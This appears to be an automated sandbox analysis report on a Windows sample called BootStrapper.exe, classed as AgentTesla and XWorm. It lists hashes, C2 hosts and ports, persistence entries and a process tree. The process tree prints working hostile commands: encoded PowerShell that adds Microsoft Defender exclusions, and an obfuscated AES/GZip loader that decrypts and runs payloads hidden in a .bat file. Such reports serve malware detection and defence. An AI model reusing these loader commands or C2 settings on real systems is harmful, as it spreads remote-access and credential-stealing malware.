agenttesla | 2cfa79782d5720680721ceba226d34dbf6a0a40b2a89e806a2b5d434ed30a62f

Analysis

max time kernel
395s
max time network
399s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
24-05-2024 14:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootStrapper.exe
Size

172KB
MD5

b39f03ec65e160fa650a334f23fbf4ce
SHA1

a6c7df0c9f13f3957b1cc4b08f10076fb150a0ce
SHA256

2cfa79782d5720680721ceba226d34dbf6a0a40b2a89e806a2b5d434ed30a62f
SHA512

d636b77c02c63716800db1beb8e4d63154ffbcd78b0abc6b8c1fafddf3d30e6ae57985b6565e0b7d960d67f6804bb637ffed1c2298fdec53d8bd40c40baeb6a1
SSDEEP

3072:kCcgU0lSE2Vw/jdTsvJNVNtcA2lXky01wWkf3+Jptd3mfqwpTGhK0CD1:kCPU68UovJNVv2lXFZ/sp8g

Score

10^/10

agenttesla xworm execution keylogger persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

total-parties.gl.at.ply.gg:53271

rest-involving.gl.at.ply.gg:18410

Attributes

Install_directory
%Userprofile%
install_file
System.exe

Extracted

Family

xworm

Version

5.0

greater-strategic.gl.at.ply.gg:56762

Mutex

jaH0Qqkzaomv3BbG

Attributes

Install_directory
%Userprofile%
install_file
System.exe

aes.plain

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Xworm Payload 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/812-158-0x0000000007AC0000-0x0000000007B00000-memory.dmp	family_xworm
behavioral1/memory/4212-169-0x0000000007190000-0x00000000071DE000-memory.dmp	family_xworm
behavioral1/memory/4816-277-0x00000000079B0000-0x00000000079C2000-memory.dmp	family_xworm
behavioral1/memory/4344-281-0x0000000006FB0000-0x0000000006FCA000-memory.dmp	family_xworm
behavioral1/memory/3644-282-0x0000000007970000-0x000000000798A000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\RobloxPlayerInstaller.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\Using System.exe	family_xworm
behavioral1/memory/4564-300-0x0000000000790000-0x00000000007A2000-memory.dmp	family_xworm
behavioral1/memory/1704-304-0x0000000000320000-0x000000000033A000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 1 IoCs

Processes:

resource	yara_rule
C:\Windows\Guna.UI2.dll	family_agenttesla

Blocklisted process makes network request 25 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow	pid	process
61	4544
62	4544
65	4816	powershell.exe
66	4344	powershell.exe
74	4816	powershell.exe
76	4344	powershell.exe
78	3644	powershell.exe
80	4344	powershell.exe
85	4344	powershell.exe
107	4816	powershell.exe
116	3644	powershell.exe
190	4816	powershell.exe
195	4816	powershell.exe
200	4816	powershell.exe
204	4816	powershell.exe
208	4816	powershell.exe
211	4816	powershell.exe
212	4816	powershell.exe
243	4816	powershell.exe
264	3644	powershell.exe
269	4816	powershell.exe
271	3644	powershell.exe
272	3644	powershell.exe
274	3644	powershell.exe
276	4816	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 23 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1388	powershell.exe
2556	powershell.exe
2448	powershell.exe
2936	powershell.exe
4816	powershell.exe
3644	powershell.exe
812	powershell.exe
4212	powershell.exe
4508	powershell.exe
4368	powershell.exe
4344	powershell.exe
4404	powershell.exe
980	powershell.exe
1324	powershell.exe
1144	powershell.exe
4544	powershell.exe
752	powershell.exe
4656	powershell.exe
4480	powershell.exe
5076	powershell.exe
436	powershell.exe
4576	powershell.exe
3704	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Yorux Loader V2.exeWScript.exeWScript.exeWScript.exeBootStrapper.exeLoader.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Yorux Loader V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	BootStrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Loader.exe

Drops startup file 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	powershell.exe

Executes dropped EXE 5 IoCs

Processes:

Yorux BootStrapper.exeLoader.exeYorux Loader V2.exeRobloxPlayerInstaller.exeUsing System.exe

pid process

4644 Yorux BootStrapper.exe
4408 Loader.exe
2292 Yorux Loader V2.exe
4564 RobloxPlayerInstaller.exe
1704 Using System.exe

pid	process
4644	Yorux BootStrapper.exe
4408	Loader.exe
2292	Yorux Loader V2.exe
4564	RobloxPlayerInstaller.exe
1704	Using System.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\System.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\System.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\Temp\\System.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

49 raw.githubusercontent.com
50 raw.githubusercontent.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

64 ip-api.com
273 ip-api.com

flow	ioc
49	raw.githubusercontent.com
50	raw.githubusercontent.com

flow	ioc
64	ip-api.com
273	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"	powershell.exe

Drops file in Windows directory 10 IoCs

Processes:

BootStrapper.exeLoader.exe

description	ioc	process
File created	C:\Windows\Yorux BootStrapper.exe	BootStrapper.exe
File created	C:\Windows\Yorux BootStrapper.runtimeconfig.json	BootStrapper.exe
File created	C:\Windows\Yorux Loader V2.dll	Loader.exe
File created	C:\Windows\Yorux Loader V2.runtimeconfig.json	Loader.exe
File created	C:\Windows\Yorux BootStrapper.dll	BootStrapper.exe
File created	C:\Windows\Guna.UI2.dll	Loader.exe
File created	C:\Windows\Yorux Loader V2.exe	Loader.exe
File created	C:\Windows\RobloxPlayerInstaller.bat	Loader.exe
File created	C:\Windows\System.bat	Loader.exe
File created	C:\Windows\Using_System.bat	Loader.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2276 schtasks.exe
4448 schtasks.exe
2408 schtasks.exe

pid	process
2276	schtasks.exe
4448	schtasks.exe
2408	schtasks.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exemsedge.exeYorux Loader V2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Yorux Loader V2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Yorux Loader V2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Yorux Loader V2.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133610351295741215"	chrome.exe

Modifies registry class 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-540404634-651139247-2967210625-1000\{52A77C92-258A-4C73-B57C-C32F25D33C4F}	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	process
2556	powershell.exe
2556	powershell.exe
1388	powershell.exe
1388	powershell.exe
1388	powershell.exe
2448	powershell.exe
2448	powershell.exe
2448	powershell.exe
812	powershell.exe
812	powershell.exe
4212	powershell.exe
4212	powershell.exe
812	powershell.exe
4212	powershell.exe
4508	powershell.exe
4508	powershell.exe
2936	powershell.exe
2936	powershell.exe
4508	powershell.exe
4368	powershell.exe
4368	powershell.exe
2936	powershell.exe
4368	powershell.exe
4816	powershell.exe
4816	powershell.exe
4816	powershell.exe
3644	powershell.exe
3644	powershell.exe
4344	powershell.exe
4344	powershell.exe
3644	powershell.exe
4344	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4404	powershell.exe
4404	powershell.exe
3704	powershell.exe
3704	powershell.exe
4404	powershell.exe
3704	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
4480	powershell.exe
4480	powershell.exe
4480	powershell.exe
1324	powershell.exe
1324	powershell.exe
5076	powershell.exe
5076	powershell.exe
1324	powershell.exe
5076	powershell.exe
436	powershell.exe
436	powershell.exe
436	powershell.exe
1144	powershell.exe
1144	powershell.exe
4576	powershell.exe
4576	powershell.exe
1144	powershell.exe
4576	powershell.exe
752	powershell.exe
752	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3644 powershell.exe
4344 powershell.exe
4816 powershell.exe

pid	process
3644	powershell.exe
4344	powershell.exe
4816	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs

Processes:

chrome.exemsedge.exe

pid	process
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
1900	msedge.exe
1900	msedge.exe
2936	chrome.exe
2936	chrome.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeIncreaseQuotaPrivilege	4508	powershell.exe
Token: SeSecurityPrivilege	4508	powershell.exe
Token: SeTakeOwnershipPrivilege	4508	powershell.exe
Token: SeLoadDriverPrivilege	4508	powershell.exe
Token: SeSystemProfilePrivilege	4508	powershell.exe
Token: SeSystemtimePrivilege	4508	powershell.exe
Token: SeProfSingleProcessPrivilege	4508	powershell.exe
Token: SeIncBasePriorityPrivilege	4508	powershell.exe
Token: SeCreatePagefilePrivilege	4508	powershell.exe
Token: SeBackupPrivilege	4508	powershell.exe
Token: SeRestorePrivilege	4508	powershell.exe
Token: SeShutdownPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeSystemEnvironmentPrivilege	4508	powershell.exe
Token: SeRemoteShutdownPrivilege	4508	powershell.exe
Token: SeUndockPrivilege	4508	powershell.exe
Token: SeManageVolumePrivilege	4508	powershell.exe
Token: 33	4508	powershell.exe
Token: 34	4508	powershell.exe
Token: 35	4508	powershell.exe
Token: 36	4508	powershell.exe
Token: SeIncreaseQuotaPrivilege	2936	powershell.exe
Token: SeSecurityPrivilege	2936	powershell.exe
Token: SeTakeOwnershipPrivilege	2936	powershell.exe
Token: SeLoadDriverPrivilege	2936	powershell.exe
Token: SeSystemProfilePrivilege	2936	powershell.exe
Token: SeSystemtimePrivilege	2936	powershell.exe
Token: SeProfSingleProcessPrivilege	2936	powershell.exe
Token: SeIncBasePriorityPrivilege	2936	powershell.exe
Token: SeCreatePagefilePrivilege	2936	powershell.exe
Token: SeBackupPrivilege	2936	powershell.exe
Token: SeRestorePrivilege	2936	powershell.exe
Token: SeShutdownPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeSystemEnvironmentPrivilege	2936	powershell.exe
Token: SeRemoteShutdownPrivilege	2936	powershell.exe
Token: SeUndockPrivilege	2936	powershell.exe
Token: SeManageVolumePrivilege	2936	powershell.exe
Token: 33	2936	powershell.exe
Token: 34	2936	powershell.exe
Token: 35	2936	powershell.exe
Token: 36	2936	powershell.exe
Token: SeIncreaseQuotaPrivilege	4508	powershell.exe
Token: SeSecurityPrivilege	4508	powershell.exe
Token: SeTakeOwnershipPrivilege	4508	powershell.exe
Token: SeLoadDriverPrivilege	4508	powershell.exe
Token: SeSystemProfilePrivilege	4508	powershell.exe
Token: SeSystemtimePrivilege	4508	powershell.exe
Token: SeProfSingleProcessPrivilege	4508	powershell.exe
Token: SeIncBasePriorityPrivilege	4508	powershell.exe
Token: SeCreatePagefilePrivilege	4508	powershell.exe
Token: SeBackupPrivilege	4508	powershell.exe
Token: SeRestorePrivilege	4508	powershell.exe
Token: SeShutdownPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeSystemEnvironmentPrivilege	4508	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exemsedge.exe

pid	process
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
2936	chrome.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe

Suspicious use of SendNotifyMessage 56 IoCs

Processes:

chrome.exemsedge.exe

pid	process
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe
1900	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3644 powershell.exe
4816 powershell.exe
4344 powershell.exe

pid	process
3644	powershell.exe
4816	powershell.exe
4344	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

BootStrapper.exeYorux BootStrapper.exeLoader.execmd.execmd.execmd.exepowershell.exepowershell.exepowershell.exeWScript.exeWScript.exeWScript.execmd.execmd.exe

description	pid	process	target process
PID 2208 wrote to memory of 2556	2208	BootStrapper.exe	powershell.exe
PID 2208 wrote to memory of 2556	2208	BootStrapper.exe	powershell.exe
PID 2208 wrote to memory of 2556	2208	BootStrapper.exe	powershell.exe
PID 2208 wrote to memory of 4644	2208	BootStrapper.exe	Yorux BootStrapper.exe
PID 2208 wrote to memory of 4644	2208	BootStrapper.exe	Yorux BootStrapper.exe
PID 4644 wrote to memory of 4408	4644	Yorux BootStrapper.exe	Loader.exe
PID 4644 wrote to memory of 4408	4644	Yorux BootStrapper.exe	Loader.exe
PID 4644 wrote to memory of 4408	4644	Yorux BootStrapper.exe	Loader.exe
PID 4408 wrote to memory of 1388	4408	Loader.exe	powershell.exe
PID 4408 wrote to memory of 1388	4408	Loader.exe	powershell.exe
PID 4408 wrote to memory of 1388	4408	Loader.exe	powershell.exe
PID 4408 wrote to memory of 2292	4408	Loader.exe	Yorux Loader V2.exe
PID 4408 wrote to memory of 2292	4408	Loader.exe	Yorux Loader V2.exe
PID 4408 wrote to memory of 2156	4408	Loader.exe	cmd.exe
PID 4408 wrote to memory of 2156	4408	Loader.exe	cmd.exe
PID 4408 wrote to memory of 2156	4408	Loader.exe	cmd.exe
PID 4408 wrote to memory of 4956	4408	Loader.exe	cmd.exe
PID 4408 wrote to memory of 4956	4408	Loader.exe	cmd.exe
PID 4408 wrote to memory of 4956	4408	Loader.exe	cmd.exe
PID 4408 wrote to memory of 3992	4408	Loader.exe	cmd.exe
PID 4408 wrote to memory of 3992	4408	Loader.exe	cmd.exe
PID 4408 wrote to memory of 3992	4408	Loader.exe	cmd.exe
PID 4956 wrote to memory of 2448	4956	cmd.exe	powershell.exe
PID 4956 wrote to memory of 2448	4956	cmd.exe	powershell.exe
PID 4956 wrote to memory of 2448	4956	cmd.exe	powershell.exe
PID 2156 wrote to memory of 812	2156	cmd.exe	powershell.exe
PID 2156 wrote to memory of 812	2156	cmd.exe	powershell.exe
PID 2156 wrote to memory of 812	2156	cmd.exe	powershell.exe
PID 3992 wrote to memory of 4212	3992	cmd.exe	powershell.exe
PID 3992 wrote to memory of 4212	3992	cmd.exe	powershell.exe
PID 3992 wrote to memory of 4212	3992	cmd.exe	powershell.exe
PID 2448 wrote to memory of 4508	2448	powershell.exe	powershell.exe
PID 2448 wrote to memory of 4508	2448	powershell.exe	powershell.exe
PID 2448 wrote to memory of 4508	2448	powershell.exe	powershell.exe
PID 812 wrote to memory of 2936	812	powershell.exe	powershell.exe
PID 812 wrote to memory of 2936	812	powershell.exe	powershell.exe
PID 812 wrote to memory of 2936	812	powershell.exe	powershell.exe
PID 4212 wrote to memory of 4368	4212	powershell.exe	powershell.exe
PID 4212 wrote to memory of 4368	4212	powershell.exe	powershell.exe
PID 4212 wrote to memory of 4368	4212	powershell.exe	powershell.exe
PID 2448 wrote to memory of 4448	2448	powershell.exe	WScript.exe
PID 2448 wrote to memory of 4448	2448	powershell.exe	WScript.exe
PID 2448 wrote to memory of 4448	2448	powershell.exe	WScript.exe
PID 812 wrote to memory of 2728	812	powershell.exe	WScript.exe
PID 812 wrote to memory of 2728	812	powershell.exe	WScript.exe
PID 812 wrote to memory of 2728	812	powershell.exe	WScript.exe
PID 4212 wrote to memory of 448	4212	powershell.exe	WScript.exe
PID 4212 wrote to memory of 448	4212	powershell.exe	WScript.exe
PID 4212 wrote to memory of 448	4212	powershell.exe	WScript.exe
PID 4448 wrote to memory of 2704	4448	WScript.exe	cmd.exe
PID 4448 wrote to memory of 2704	4448	WScript.exe	cmd.exe
PID 4448 wrote to memory of 2704	4448	WScript.exe	cmd.exe
PID 2728 wrote to memory of 2524	2728	WScript.exe	cmd.exe
PID 2728 wrote to memory of 2524	2728	WScript.exe	cmd.exe
PID 2728 wrote to memory of 2524	2728	WScript.exe	cmd.exe
PID 448 wrote to memory of 1584	448	WScript.exe	cmd.exe
PID 448 wrote to memory of 1584	448	WScript.exe	cmd.exe
PID 448 wrote to memory of 1584	448	WScript.exe	cmd.exe
PID 2524 wrote to memory of 4816	2524	cmd.exe	powershell.exe
PID 2524 wrote to memory of 4816	2524	cmd.exe	powershell.exe
PID 2524 wrote to memory of 4816	2524	cmd.exe	powershell.exe
PID 1584 wrote to memory of 3644	1584	cmd.exe	powershell.exe
PID 1584 wrote to memory of 3644	1584	cmd.exe	powershell.exe
PID 1584 wrote to memory of 3644	1584	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\BootStrapper.exe
"C:\Users\Admin\AppData\Local\Temp\BootStrapper.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAdwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAeQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAYQBrACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556

C:\Windows\Yorux BootStrapper.exe
"C:\Windows\Yorux BootStrapper.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4644

C:\Users\Admin\AppData\Roaming\Yoruxx\Loader\Loader.exe
"C:\Users\Admin\AppData\Roaming\Yoruxx\Loader\Loader.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAawBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAcQBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAeQBqACMAPgA="
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\Yorux Loader V2.exe
"C:\Windows\Yorux Loader V2.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\RobloxPlayerInstaller.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FVNBAV5hCFFpcmokEXdLKpKeNrzjcRlF7S4OiloR0nw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('thF/c6lNRygw0iOWz/3f3Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GUIcX=New-Object System.IO.MemoryStream(,$param_var); $kzKxd=New-Object System.IO.MemoryStream; $aONIx=New-Object System.IO.Compression.GZipStream($GUIcX, [IO.Compression.CompressionMode]::Decompress); $aONIx.CopyTo($kzKxd); $aONIx.Dispose(); $GUIcX.Dispose(); $kzKxd.Dispose(); $kzKxd.ToArray();}function execute_function($param_var,$param2_var){ $xtOzb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Cxrvl=$xtOzb.EntryPoint; $Cxrvl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Windows\RobloxPlayerInstaller.bat';$jNKhC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Windows\RobloxPlayerInstaller.bat').Split([Environment]::NewLine);foreach ($CXuui in $jNKhC) { if ($CXuui.StartsWith(':: ')) { $uBozz=$CXuui.Substring(3); break; }}$payloads_var=[string[]]$uBozz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
